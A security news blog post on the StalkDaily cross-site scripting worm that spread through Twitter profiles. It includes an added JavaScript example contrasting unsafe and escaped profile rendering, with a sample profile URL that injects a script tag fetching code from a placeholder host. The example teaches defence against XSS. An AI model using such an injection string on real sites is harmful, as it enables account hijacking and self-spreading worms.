Thousands of Twitter users are warning each other about what appears to be a fast-moving attack affecting the system.
Affected Twitter profiles appear to be directing unsuspecting users to the website stalkdaily.com. (Please do not visit this site)
(Some notes about the video above. Yes, I do make a mistake in the video, as it's actually the 12th of April today, not the 11th. Sorry about that. I've also posted the video on YouTube.)
Curiously, a lot of Twitter users appear to be posting status updates all containing phrases such as:
Dude, www.StalkDaily.com is awesome. What's the fuss?
Virus!? What? www.StalkDaily.com is legit!
That last one is particularly sneaky, as it appears to try to discredit the genuine warnings that have been spreading through the micro-blogging site.
Ironically, some Twitter users have compounded the problem by posting warning messages about the StalkDaily website on the network, giving a live link to the suspicious website in the process.
Twitter has responded by shutting down the @StalkDaily profile, claiming it has shown suspicious activity, and has reset passwords of Twitter users who it believes have been hit.
If you believe you may have been affected by this latest attack, don’t just change your Twitter password – make sure you change your credentials on any other site where you may have been using the same password.
Of course, this isn't the first time that Twitter users have suffered an attack. Last month, fans of the popular micro-blogging site were barraged with messages sent from compromised accounts trying to drive traffic to a pornographic website called ChatWebCamFree.
We’ll post more information as it becomes available. Obviously, in the meantime, it would be wise not to click on any links directing you to StalkDaily.com.
Some more information is beginning to emerge about the attack.
The hackers behind the attack planted an additional script into users' profiles alongside the StalkDaily link, meaning that you could become infected just by viewing an infected user's details.
You can read more about this in this blog entry by Damon Cortesi.
For their part, Twitter has confirmed that what occurred was a cross-site scripting (XSS) attack, spreading links across the system without users’ consent. The site has reassured users that they have taken steps to close the holes that allowed the worm to spread, and that “no passwords, phone numbers, or other sensitive information were compromised” as part of the attack.
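As an added illustration (not code from Twitter or from the original post), the sketch below shows the class of flaw described above, stored profile data echoed into a page without encoding, next to an output-encoded version. The field names, markup and sample profile are assumptions constructed for the example.

```javascript
// Added example: field names (name, bio, url) and the markup are assumptions,
// not Twitter's real schema or templates.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can end a text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allow only absolute http(s) links; anything else (javascript:, data:,
// unparsable input) yields null and no link is rendered.
function safeHref(value) {
  try {
    const url = new URL(String(value).trim());
    return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
  } catch {
    return null;
  }
}

// Unsafe "before": stored values are concatenated straight into the page,
// so markup saved in a profile field runs in every viewer's browser.
function renderProfileUnsafe(p) {
  return `<div class="profile"><h2>${p.name}</h2><p>${p.bio}</p>` +
         `<a href="${p.url}">${p.url}</a></div>`;
}

// Hardened "after": encode on output and validate the link scheme.
function renderProfileSafe(p) {
  const href = safeHref(p.url);
  const link = href
    ? `<a href="${escapeHtml(href)}" rel="nofollow noopener">${escapeHtml(href)}</a>`
    : '';
  return `<div class="profile"><h2>${escapeHtml(p.name)}</h2>` +
         `<p>${escapeHtml(p.bio)}</p>${link}</div>`;
}

// Constructed sample: a profile whose URL field closes the attribute and
// appends a script tag (placeholder host, not a real indicator).
const tamperedProfile = {
  name: 'Example User',
  bio: 'Just here for the updates & links',
  url: 'http://example.invalid/"></a><script src="//example.invalid/x.js"></script><a href="',
};
```

Rendering `tamperedProfile` with `renderProfileUnsafe` emits a live `<script>` element, while `renderProfileSafe` emits only an inert, encoded link.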
In the latest development, it is being reported that a 17-year-old man called Mikeyy Mooney has claimed responsibility for the attack.
Although StalkDaily originally denied any involvement in the attack with a statement on their website, this was later replaced with an admission that a newspaper interview with worm creator Mikeyy Mooney was genuine.